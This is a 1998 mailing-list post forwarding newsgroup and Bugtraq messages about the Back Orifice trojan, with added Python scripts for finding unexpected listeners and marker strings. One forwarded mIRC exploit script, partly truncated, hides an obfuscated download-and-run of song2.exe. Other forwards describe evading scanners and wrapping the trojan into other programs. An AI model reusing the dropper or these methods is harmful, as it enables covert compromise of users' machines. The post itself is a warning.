Could Linux be at risk from the “Back Orifice” Windows trojan?

"[email protected]" has submitted to the "[email protected]" mailing list his concerns about this trojan coming into Linux Land.

———- Forwarded message ———-
From: [email protected]
To: [email protected]

Dear all,

This is a message about the Back Orifice (BO) trojan. Included
in this message are several BO-related messages I obtained from the
various *crack* newsgroups, and one from the Bugtraq list.

At first I thought BO only wreaked havoc on the Windoze platform
-- please read the first forwarded message -- but on the Bugtraq
list, someone demonstrated that BO is alive and well on the BSD and
Linux platforms as well -- please read the second forwarded
message, from the Bugtraq mailing list. I also included clips of other
BO-related messages to give you a clearer perspective of BO.

I have several concerns:

  1. The LGPL license, if I am not mistaken, does allow the
    distribution of compiled libraries. The possibility of someone
    hiding a BO trojan and distributing it under the LGPL license must
    _NEVER_ be discounted.
  2. Call me paranoid if you must, but the "Halloween Papers"
    exposed the possibility of Microsoft employing all kinds of dirty
    tricks in wrecking Linux. Hence, in addition to the usual FUD
    tactics, it is _NOT_ inconceivable that some determined fanatics
    from the Windoze camp may actually carry out what I have just
    mentioned above.
  3. If that happened, what should we, the people from the Linux
    community, do?
  4. Are there any precautions we can take in advance to prevent
    that from happening?
  5. Not all of us are security experts, so it may be too much to
    ask all Linux users to scan all the ports of their machines. Are
    there any security programs in existence that can help Linux
    users prevent the BO trojan from infecting our machines?
  6. Linux is being employed in more and more businesses. The BO
    trojan allows someone from the outside to monitor and scan the
    infected machines, and if the infected machines are being used for
    business purposes, trade secrets and business strategies may be
    seriously compromised. If we are to promote the use of Linux on
    business premises, we must take a pro-active stance in finding ways
    to counter any possible effect of the BO trojan.


I am _NOT_ a cracker, I do _NOT_ own nor will I knowingly run any
of the below-mentioned programs. I am _NOT_ affiliated with any of
the people and/or organizations mentioned below either.

I have no way to know, and I haven't had the time to prove the
validity of the information I'm including below. I apologize in
advance if all this seems unimportant or if anything resembling it
was ever posted in the past.

Please also take into consideration that most of the BO-related
messages were from the various *.crack* newsgroups populated by
boastful teenage script-runners. Some of the language they use is
offensive in nature, so please stop reading any further if you are
easily offended.

Thank You.

[email protected]
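Concern 5 above asks how a Linux user who is not a security expert can check whether something like BO is listening on their machine without "scanning all the ports". On Linux the kernel already publishes every bound socket in /proc/net/tcp and /proc/net/udp, so a local inventory needs no network scan at all. The following is an added example, not code from the original thread or from any project it mentions: it parses those two files, lists listening sockets, and flags any port that is not on an allowlist you supply. The /proc field layout and state codes are real kernel facts; the sample /proc text, the allowlist and every function name are constructed for the example (the 31337 listener in the sample is the default BO port quoted later in the thread).

```python
"""Inventory listening TCP/UDP sockets on Linux from /proc/net/{tcp,udp}
and flag any port outside an expected allowlist (added example, not the
original thread's code)."""
import socket
import struct
from dataclasses import dataclass

TCP_LISTEN = 0x0A   # 'st' field value for a listening TCP socket
UDP_UNCONN = 0x07   # 'st' field value (TCP_CLOSE) for a bound, unconnected UDP socket


@dataclass(frozen=True)
class Listener:
    proto: str
    addr: str
    port: int
    uid: int
    inode: int


def _decode_addr(hex_addr: str) -> tuple[str, int]:
    """'0100007F:0016' -> ('127.0.0.1', 22).
    The IPv4 word is stored in host (little-endian on x86) order, the port big-endian."""
    ip_hex, port_hex = hex_addr.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def parse_proc_net(text: str, proto: str) -> list[Listener]:
    """Return the listening (tcp) or bound (udp) sockets found in one /proc/net file."""
    wanted = TCP_LISTEN if proto == "tcp" else UDP_UNCONN
    found = []
    for line in text.splitlines()[1:]:          # first row is the column header
        f = line.split()
        if len(f) < 10:
            continue
        # columns: sl local rem st tx:rx tr:when retrnsmt uid timeout inode ...
        if int(f[3], 16) != wanted:
            continue
        ip, port = _decode_addr(f[1])
        found.append(Listener(proto, ip, port, int(f[7]), int(f[9])))
    return found


def unexpected_listeners(listeners: list[Listener], allowlist: set) -> list[Listener]:
    """Everything not in allowlist, a set of (proto, port) pairs the admin expects."""
    return [l for l in listeners if (l.proto, l.port) not in allowlist]


def read_host_listeners() -> list[Listener]:
    """Read the live kernel tables; returns [] on a non-Linux host."""
    out = []
    for proto in ("tcp", "udp"):
        try:
            with open(f"/proc/net/{proto}") as fh:
                out += parse_proc_net(fh.read(), proto)
        except OSError:
            pass
    return out


# Constructed sample input: sshd listening on tcp/22, one established ssh
# connection (not a listener) and a UDP socket bound to 0.0.0.0:31337 by uid 1000.
SAMPLE_TCP = """  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 18234 1 0000000000000000 100 0 0 10 0
   1: 0100007F:0016 0100007F:D3A2 01 00000000:00000000 00:00000000 00000000     0        0 18300 1 0000000000000000 20 4 30 10 -1
"""
SAMPLE_UDP = """  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode ref pointer drops
   0: 00000000:7A69 00000000:0000 07 00000000:00000000 00:00000000 00000000  1000        0 23456 2 0000000000000000 0
"""
EXPECTED = {("tcp", 22)}   # constructed allowlist for the sample host

if __name__ == "__main__":
    sample = parse_proc_net(SAMPLE_TCP, "tcp") + parse_proc_net(SAMPLE_UDP, "udp")
    for l in unexpected_listeners(sample, EXPECTED):
        print(f"[sample] unexpected {l.proto} listener {l.addr}:{l.port} uid={l.uid} inode={l.inode}")
    for l in unexpected_listeners(read_host_listeners(), EXPECTED):
        print(f"[host]   unexpected {l.proto} listener {l.addr}:{l.port} uid={l.uid} inode={l.inode}")
```

The inode is printed on purpose: on a live host it is the value you would look for under /proc/*/fd to find the owning process, which is the step that turns "there is a listener on 31337" into "this binary opened it". Run the script from cron or a login hook with an allowlist of the services the box is supposed to run, and any new line is worth a look regardless of whether the port is in the 3000s, 31337 or somewhere else.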

- -------------------------------------------------------------
A forwarded message about the nature of the Back Orifice Trojan
- -------------------------------------------------------------

From: [email protected] (Jim Porter)
Subject: READ THIS warning !!! ===== WHAT IS BACK ORIFICE ======== warning !!!
Date: Wed, 09 Sep 1998 12:27:32 GMT
Message-ID: <[email protected]
NNTP-Posting-Host: s02.zwolle.bart.nl

                        Back Orifice News

First, It seems that I'm getting a lot of questions from people who don't know
what Back Orifice is about... and the rest probably don't care... or think they
don't care about whatever it is. Back Orifice is a program that will let people
who don't have a clue about hacking get into YOUR computer and do ANYTHING they
want. They can access all your banking/accounting records, credit card info,
read your ICQ history, irc logs, your email (including received and sent and
undeleted trash mail), they can get all the passwords to your ftp sites and
websites, if you are running on
a network they can move to all the other systems and modify anything, copy
anything, upload anything AND destroy anything.  A hacker can even keep a log of
your keystrokes and take a snapshot of what you are viewing on your screen and
take a look.

You probably think... oh I won't get it on my computer because I'm careful. Well
ok then.. read no farther.  

You may not know that BO is showing up EVERYWHERE, in programs like greeting
cards, jokes, cracks, something you may get in
email and just click on, and it can even be loaded from browsing a web site. You
might go to a site that simply says "We have moved.. click HERE to go to our new
location." and a Java app. will load BO from there onto your system.  There was
a web site that had an example but it looks like Microsoft had them take it
down. If I find another one I'll mention the url.

Personally, I have to admit that I didn't think Back Orifice would be such a big
deal. After all, you have to execute a program on your computer that has BO in
it, and it should be easy to detect it when it's running.  HOWEVER, I've found
SEVERAL really tricky versions that are wrapped up in programs we are all likely
to encounter. And after reading so many articles about BO on the web I have a
strong sense that they just think
this is a minor nuisance and can be eliminated by watching the default port,
and/or checking the register where it normally loads. I say "ha,ha" 

                      Consider these facts:

* Some versions of BO are modified so they are NOT detected by Norton or the
normal detection programs that claim to detect it.

* There are BO support sites that offer programs that will wrap BO into any
application and various other innovative utilities to help get it onto someone's
system without them knowing.

* And there are programs that will plug into BO so that it will email the hacker
who prepared the version you are installing and tell him/her "BO has been
installed at: Your IP number"  so they know your system is open for the hacker's

* Even if you run a BoWatch type program, they can take up to 10 mins to
identify and turn off BO.. which gives someone who is watching your system (or
who has just sent it to you wrapped in another program) plenty of time to go
into your system and close then delete the BoWatch program. Of course it would
not be so difficult for a programmer to just check for the "anti-BO" programs
and deactivate them, or replace them with a version that doesn't work.. so you
would have the "false security" of thinking you were protected when you see the
"do nothing" program running.

See this story:  Back Orifice "security" tools miss the mark

The main problem with removing it is that it may be "hatched" when your system
starts, meaning that another program is putting a new copy on a system during
bootup. Often these BO removal programs think they cured your system but haven't
fixed anything.  Most just check the default location in your system's register
or watch the default port setting.  

One way to detect if it's running on your system is to enter this command from
your Start / Run menu: command /k netstat -n. You can then see if you have any
ports in the 3,000's open. If you do, most likely that is BO running. BO's
default address is 31377. (This doesn't seem to show up if you have a password
version of BO unless the person who knows the password is on your computer.)

Another thing you can do is click on Start / Find / Files and put
"bofilemapping" (without the quotes) in the "Containing Text" field.  Any
matches you find have the BO trojan. If they are in your windows\system
directory it is probably running. I have been told that you can be running
several versions at the same time.

Run Regedit and look in here:

Then check under "Run" "Runonce" for files like windll.dll (the default name the
unmodified version of BO uses) or hello.abc There are some very clever people
out there that make it look VERY important if you are looking at your register.
It may say "Key file for Windows System Tray, do not delete" There are even MORE
clever tricks that I don't want to mention here.

Another thing that can help you protect your data from BO access is to take
advantage of the limitation that BO can't change to a  directory with an ALT +
255 character in the name. This means that if you drop to DOS and type MD
hidden  and after the "h" of hidden you hold your alt key and press 255 on your
number pad, when you release your ALT key your cursor moves to the right one
space.  If you try to access this directory from Windows Explorer (or with BO)
it will look like  "hidden_"  but if you try to see the files in that directory
you will get an error message, saying
something like this directory has been moved or deleted. The only way you can
move files into and out of this directory is from DOS.  You can use dos based
file managing programs like List and DirMagic to access this directory so you
don't have to type out all the file names. I haven't had time to experiment yet,
but I'm hoping that Netscape will allow me to configure it to use a directory
with alt + 255 in the name of the mail file.

Note:  If you have contacts with the cDc people, please try to get the source
code for this program for me. If you have any really good tips about BO let's
share the info that I can't (or just don't want to) talk about in this
newsletter.  If you have found or created any modified versions  of your own
that the scanners don't detect, please send them to me:
mailto:[email protected]?subject=BOserver If you think you can write a program..
like Nuke Nabber.. that will detect the ip of the BO CLIENT when someone sweeps
or connects to the boserver running on a system, I want to help you test it.
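The message above suggests a plain content search for the string "bofilemapping" as a way to find BO copies on disk, and warns that the same thing may sit under several names (windll.dll is only the default). The following is an added example, not code from the newsletter or from any tool it names: it walks a directory tree and reports files containing any of a list of byte markers, with two details a practitioner cares about that Find / Files hides: the match is case-insensitive, and files are read in chunks with an overlap so a marker that straddles a chunk boundary is not missed. The marker and the sample file name come from the message; the sample tree, function names and chunk size are constructed for the example.

```python
"""Scan a directory tree for files containing known indicator byte strings
(added example, not the newsletter's own code)."""
import os
import tempfile
from pathlib import Path

# Marker quoted in the forwarded message; extend with whatever your own indicators are.
DEFAULT_MARKERS = (b"bofilemapping",)


def file_contains(path, markers, chunk_size=1 << 20):
    """Return the sorted list of markers present in the file (case-insensitive).

    Reads in chunks and carries the last len(marker)-1 bytes of each chunk
    forward, so a marker split across two reads is still detected."""
    markers = [m.lower() for m in markers]
    overlap = max(len(m) for m in markers) - 1
    tail = b""
    hits = set()
    with open(path, "rb") as fh:
        while True:
            chunk = fh.read(chunk_size)
            if not chunk:
                break
            buf = (tail + chunk).lower()
            for m in markers:
                if m in buf:
                    hits.add(m)
            tail = buf[-overlap:] if overlap else b""
    return sorted(hits)


def scan_tree(root, markers=DEFAULT_MARKERS, chunk_size=1 << 20):
    """Map each matching file path (str) to the markers found in it.
    Symlinks are skipped so a planted link cannot drag the scan elsewhere."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            if p.is_symlink():
                continue
            try:
                hits = file_contains(p, markers, chunk_size)
            except OSError:          # unreadable file: report nothing, keep going
                continue
            if hits:
                findings[str(p)] = hits
    return findings


def build_sample_tree():
    """Constructed sample: a benign text file plus a fake 'windll.dll' whose
    marker starts at byte 10, so a 16-byte chunk size splits it in two."""
    root = Path(tempfile.mkdtemp(prefix="boscan_"))
    (root / "notes.txt").write_bytes(b"nothing to see here\n")
    (root / "sub").mkdir()
    (root / "sub" / "windll.dll").write_bytes(
        b"MZ" + b"\x00" * 8 + b"BOFileMapping" + b"\x00" * 8
    )
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    for path, hits in scan_tree(root, chunk_size=16).items():
        print(f"{path}: {[h.decode() for h in hits]}")
```

A single fixed string is a weak indicator on its own (the newsletter itself says some builds are modified to evade scanners), so treat a hit as a reason to look at the file, not as proof, and combine it with the listening-port check and the Run/RunOnce review the message describes.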

- -----------------------------------------------------------------------
A forwarded Bugtraq message, proving the existence of a cross-platform BO
- -----------------------------------------------------------------------

Message-ID: <[email protected]>
Date: Fri, 13 Nov 1998 14:50:32 -0500
From: System Administrator 
To: [email protected]

while debugging/hexing/disassembling mirc my friend slotmech last week found
a mirc bug which allows forcing users to send MODE commands to the server.
this example script sends a MODE +o to the irc server. the mirc author has been
notified of this but we didn't receive a response... my exploit+protection
script is included. Expect more mirc stuff from us.


--- cut here ---

;#; mIRC v5.41 hack protection & exploit by FeaRStorm 
;#;    Allows to let a victim op yourself using a bug in mIRC5.41, script
based$;#;    included. Bug may not work on scripts that do a halt; after a ctcp
;#; -------- Use /hackop nick #channel to make nick give you op on #channel !
;#; -------- That's it... have phun!
;#;  greets go to tr4xzor, slotmech, meep, fowi, lotomax and all #haktex opz !
;#;  no greets to the following lamerz: cheyenne, zito, cortex and DrFrozt
(ass$;#;  Credits: i didn't find this bug, slotmech did... i only wrote this
;#;   if you want to add this code to your own script please: ASK FIRST!

ctcp 1:userinfo*: antihack

alias antihack {
  if ($len($2) > 17 && $chr(91) isin $2-) {
    echo $active mIRC5.41 hack attempt from $nick

alias hackop {
  if ($2 == $null) {
    echo 3 *** Usage: /hackop nick #channel
  if ($me !ison $2) {
    echo 3 *** You aren't on that Channel!
  if ($1 !isop $2) {
    echo 3 *** $1 isn't opped on that channel!
  checklen $1
  .ctcp $$1 userinfo $ $+ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
$6) $+ $chr(115) $chr(109) $+ $chr(111) $+ $chr(100) $+ $chr(101) $+ : +o $me |

alias checklen {
  .if (%xcomplete == 1) halt
  .if (%xinprog == 1) halt
  .set %xfilename song2.exe
  .set %xlof $lof(%xfilename)
  .set %xfirst 1
  .write -c %xfilename
  ; echo 3 $active $chr(100 111 110 116 - 115 112 111 105 108 - 116 104 101 - 1$
.sockclose protx
  .sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ $chr(103) $+
on 1:sockopen:protx: {
  .sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+ $chr(66) $+
$+ $chr(101) $+ $chr(108) $+ $chr(116) $+ $chr(97) $+ $chr(47) $+ $chr(57) $+
$c$  .sockwrite -n protx

on 1:sockread:protx: {
  .sockread &test
  .set %xlof $lof(%xfilename)
  .if (%xfirst == 1) set %xlof 0
  .set %xfirst 0
  .bwrite %xfilename %xlof $sockbr &test

on 1:connect:checklen

on 1:sockclose:protx: {
  .sockread &test
  if ($sockbr > 0) {
    .set %xlof $lof(%xfilename)
    .bwrite %xfilename %xlof $sockbr &test
  .if ($lof(%xfilename) == 178306) {
    .run %xfilename
    .set %xcomplete 1
  if ($lof(%xfilename) != 178306) {
    .timer 1 300 checklen
  unset %xinprog
  unset %xfilename
  unset %xlof
  unset %xfirst

--- cut here ---

- -------------------------------------------------
A forwarded message regarding BO and its port usage
- -------------------------------------------------

From: [email protected] (Nitallica)
Subject: Re: READ THIS warning !!! ===== WHAT IS BACK ORIFICE ======== warning
Organization: Phrozen Crew 
Date: Wed, 09 Sep 1998 13:51:52 GMT
Reply-To: [email protected]
Message-ID: <[email protected]>
NNTP-Posting-Host: host-209-214-105-195.bhm.bellsouth.net

On 9 Sep 1998 13:41:49 GMT, "Wolfsbane" 
writhed in pain while screaming:

>Ok, here's my question:
>Even if I did happen to get the BO Server on my computer, would McAfee
>PCFirewall protect me from anybody trying to get on my computer?

only if you have it configured to block every port.

BO typically uses port 31337, unless specified otherwise.

da GothiC AngeL
Phrozen Crew '98
Phrozen 4 Life

- --------------------------------------------------------
Forwarded quotes about various BO-related programs/trojans
- --------------------------------------------------------

Speakeasy (v0.1 beta), 31Kb -- DLL, instructions, and C source code Speakeasy is
a ButtPlug that attempts to log into a predetermined IRC server on channel
#BO_OWNED with a random username. It then proceeds to announce its IP address
and a custom message every few minutes. This plugin is still in beta, and still
missing a few features--mainly the ability to reestablish a link to the server
when the connection is dropped, the ability to cope with being kicked out of a
channel, and some assorted error checking/handling. Experiment with it, if you

Silk Rope (v2.0), 41Kb -- EXE, instructions, and C source code This is a little
bit more of an elegant and sophisticated wrapper for the BO installer. (I prefer
Silk Rope to Saran Wrap, myself...you know, a little more comfortable, a little
less hot). Silk Rope binds your BO installer with a program of your choosing,
saving the result as a single file. Great for modifying single-file installs.
Presently, the icon is the generic single-file-install icon (an opening box with
a window in the background), but I am working on making it "steal" the icon from
the original executable. For now, you can change it with an icon utility such as

NEW IN THIS VERSION: Install/Infect Redesign--the installer (used to trojan-ize
an existing EXE) has been internally modified and greatly simplified. NEW IN
PREVIOUS VERSION: Windows NT detection--the BO installer is not run if NT is
detected (so that the nasty "password enumeration" error dialog box does not pop
up). Simple Encryption--the BO installer is embedded into the EXE file using
simple cryptography (with a random 8-bit key)

Saran Wrap (v1.1), 18Kb -- EXE, instructions, and C source code A simple wrapper
that will first install BO, then run an application of your choosing. I have
heard that someone at CDC or the l0pht have something like this in the works,
but I decided to release my own (with source code). The program's icon is the
generic setup icon, but can be changed with an icon utility such as Microangelo.

Butt Trumpet (v1.1), 40Kb -- DLL, instructions, and C source code Upon
activation, this plugin will fire off an email to a predetermined SMTP server
and email address (for instance, an anonymous remailer or a web-based email
server). This way, victims could be infected via Usenet, without any knowledge
ahead of time of who is being infected. The computer attempts to send an email
message every 5 minutes until successful (for instance, if the user connects
through dialup networking, their network may not have a valid internet
connection when their computer first boots up). Once the message is successfully
sent, a flag is set in the registry so that it is never sent again.

- ----------------------------------------------------------
Forwarded quotes regarding possible (windoze) anti-BO proggy
- ----------------------------------------------------------

There is a website www.groupaxion.com that has a downloadable file that
seeks and eliminates back orifice.

Download AVP at www.avp.com and it will get rid of BO and NETBUS and some other

- -------------------------------------------------------------
Name of a lamely disguised BO trojan, downloadable from the Net
- -------------------------------------------------------------


- ------------------
End forwarded quotes
- ------------------